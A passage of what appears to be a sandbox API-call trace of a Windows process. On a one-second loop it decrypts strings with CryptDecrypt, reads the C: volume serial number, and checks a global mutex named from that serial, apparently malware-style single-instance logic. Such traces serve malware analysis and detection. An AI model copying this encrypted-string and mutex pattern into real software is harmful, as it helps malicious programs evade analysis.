lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0122.342] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b18 | out: hHeap=0x1db0000) returned 1 [0122.342] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db9af0 [0122.342] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c160) returned 1 [0122.342] CryptSetKeyParam (hKey=0x29c160, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0122.342] CryptDecrypt (in: hKey=0x29c160, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200fb28 | out: pbData=0x1db9af0, pdwDataLen=0x200fb28) returned 1 [0122.342] CryptDestroyKey (hKey=0x29c160) returned 1 [0122.342] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db9b38 [0122.342] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0122.342] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x2ac [0122.342] WaitForSingleObject (hHandle=0x2ac, dwMilliseconds=0x0) returned 0x0 [0122.342] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0122.342] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b38 | out: hHeap=0x1db0000) returned 1 [0122.342] ReleaseMutex (hMutex=0x2ac) returned 1 [0122.342] CloseHandle (hObject=0x2ac) returned 1 [0122.342] Sleep (dwMilliseconds=0x3e8) [0123.403] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9af0 [0123.403] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c4a0) returned 1 [0123.403] CryptSetKeyParam (hKey=0x29c4a0, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0123.403] CryptDecrypt (in: hKey=0x29c4a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200faf4 | out: pbData=0x1db9af0, pdwDataLen=0x200faf4) returned 1 [0123.403] CryptDestroyKey (hKey=0x29c4a0) returned 1 [0123.403] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9b18 [0123.403] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db9b40 [0123.404] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db9b68 [0123.404] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c4a0) returned 1 [0123.404] CryptSetKeyParam (hKey=0x29c4a0, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0123.404] CryptDecrypt (in: hKey=0x29c4a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9b68, pdwDataLen=0x200facc | out: pbData=0x1db9b68, pdwDataLen=0x200facc) returned 1 [0123.404] CryptDestroyKey (hKey=0x29c4a0) returned 1 [0123.404] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b68 | out: hHeap=0x1db0000) returned 1 [0123.404] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9b18, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0123.404] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b40 | out: hHeap=0x1db0000) returned 1 [0123.404] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0123.404] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0123.404] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b18 | out: hHeap=0x1db0000) returned 1 [0123.404] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db9af0 [0123.404] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c4a0) returned 1 [0123.404] CryptSetKeyParam (hKey=0x29c4a0, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0123.404] CryptDecrypt (in: hKey=0x29c4a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200fb28 | out: pbData=0x1db9af0, pdwDataLen=0x200fb28) returned 1 [0123.404] CryptDestroyKey (hKey=0x29c4a0) returned 1 [0123.404] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db9b38 [0123.404] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0123.404] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x330 [0123.404] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x0) returned 0x0 [0123.405] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0123.405] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b38 | out: hHeap=0x1db0000) returned 1 [0123.405] ReleaseMutex (hMutex=0x330) returned 1 [0123.405] CloseHandle (hObject=0x330) returned 1 [0123.405] Sleep (dwMilliseconds=0x3e8) [0124.466] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db1470 [0124.466] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c620) returned 1 [0124.466] CryptSetKeyParam (hKey=0x29c620, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0124.466] CryptDecrypt (in: hKey=0x29c620, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x200faf4 | out: pbData=0x1db1470, pdwDataLen=0x200faf4) returned 1 [0124.466] CryptDestroyKey (hKey=0x29c620) returned 1 [0124.466] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db1498 [0124.467] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db14c0 [0124.467] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db14e8 [0124.467] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c620) returned 1 [0124.467] CryptSetKeyParam (hKey=0x29c620, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0124.467] CryptDecrypt (in: hKey=0x29c620, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db14e8, pdwDataLen=0x200facc | out: pbData=0x1db14e8, pdwDataLen=0x200facc) returned 1 [0124.467] CryptDestroyKey (hKey=0x29c620) returned 1 [0124.467] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14e8 | out: hHeap=0x1db0000) returned 1 [0124.467] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0124.467] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14c0 | out: hHeap=0x1db0000) returned 1 [0124.467] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 [0124.467] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0124.467] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1498 | out: hHeap=0x1db0000) returned 1 [0124.467] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db1470 [0124.467] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c620) returned 1 [0124.467] CryptSetKeyParam (hKey=0x29c620, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0124.467] CryptDecrypt (in: hKey=0x29c620, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x200fb28 | out: pbData=0x1db1470, pdwDataLen=0x200fb28) returned 1 [0124.467] CryptDestroyKey (hKey=0x29c620) returned 1 [0124.467] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db14b8 [0124.467] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1b4 [0124.467] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0124.467] CloseHandle (hObject=0x1b4) returned 1 [0124.467] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 [0124.467] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14b8 | out: hHeap=0x1db0000) returned 1 [0124.468] Sleep (dwMilliseconds=0x3e8) [0125.501] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0125.501] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29bfe0) returned 1 [0125.501] CryptSetKeyParam (hKey=0x29bfe0, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0125.501] CryptDecrypt (in: hKey=0x29bfe0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0125.501] CryptDestroyKey (hKey=0x29bfe0) returned 1 [0125.501] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0125.501] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0125.501] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0125.501] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29bfe0) returned 1 [0125.501] CryptSetKeyParam (hKey=0x29bfe0, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0125.501] CryptDecrypt (in: hKey=0x29bfe0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0125.501] CryptDestroyKey (hKey=0x29bfe0) returned 1 [0125.501] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0125.501] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0125.501] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0125.502] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0125.502] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0125.502] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0125.502] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0125.502] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29bfe0) returned 1 [0125.502] CryptSetKeyParam (hKey=0x29bfe0, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0125.502] CryptDecrypt (in: hKey=0x29bfe0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0125.502] CryptDestroyKey (hKey=0x29bfe0) returned 1 [0125.502] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0125.502] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x24c [0125.502] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0125.502] CloseHandle (hObject=0x24c) returned 1 [0125.502] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0125.502] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0125.502] Sleep (dwMilliseconds=0x3e8) [0126.618] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0126.618] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0126.618] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0126.618] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0126.618] CryptDestroyKey (hKey=0x29c020) returned 1 [0126.618] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0126.618] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0126.618] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0126.618] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0126.618] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0126.618] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0126.618] CryptDestroyKey (hKey=0x29c020) returned 1 [0126.618] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0126.618] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0126.618] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0126.618] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0126.618] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0126.618] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0126.618] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0126.618] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0126.618] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0126.618] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0126.618] CryptDestroyKey (hKey=0x29c020) returned 1 [0126.618] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0126.618] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x250 [0126.618] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0x0) returned 0x102 [0126.618] CloseHandle (hObject=0x250) returned 1 [0126.619] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0126.619] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0126.619] Sleep (dwMilliseconds=0x3e8) [0130.097] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0130.097] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0130.097] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0130.097] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0130.097] CryptDestroyKey (hKey=0x29c020) returned 1 [0130.097] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0130.097] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0130.097] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0130.097] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0130.097] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0130.097] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0130.097] CryptDestroyKey (hKey=0x29c020) returned 1 [0130.097] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0130.097] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0130.097] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0130.097] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0130.097] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0130.098] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0130.098] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0130.098] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0130.098] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0130.098] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0130.098] CryptDestroyKey (hKey=0x29c020) returned 1 [0130.098] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0130.098] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x250 [0130.098] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0x0) returned 0x102 [0130.098] CloseHandle (hObject=0x250) returned 1 [0130.098] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0130.098] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0130.098] Sleep (dwMilliseconds=0x3e8) [0131.703] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0131.703] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0131.703] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0131.703] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0131.703] CryptDestroyKey (hKey=0x29c020) returned 1 [0131.703] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0131.703] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0131.703] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0131.703] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0131.703] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0131.703] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0131.703] CryptDestroyKey (hKey=0x29c020) returned 1 [0131.703] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0131.704] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0131.704] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0131.704] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0131.704] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0131.704] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0131.704] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0131.704] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0131.704] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0131.704] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0131.704] CryptDestroyKey (hKey=0x29c020) returned 1 [0131.704] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0131.704] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x250 [0131.704] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0x0) returned 0x102 [0131.704] CloseHandle (hObject=0x250) returned 1 [0131.704] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0131.704] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0131.704] Sleep (dwMilliseconds=0x3e8) [0132.737] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0132.737] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0132.737] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0132.737] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0132.737] CryptDestroyKey (hKey=0x29c020) returned 1 [0132.737] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0132.738] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0132.738] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0132.738] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0132.738] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0132.738] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, 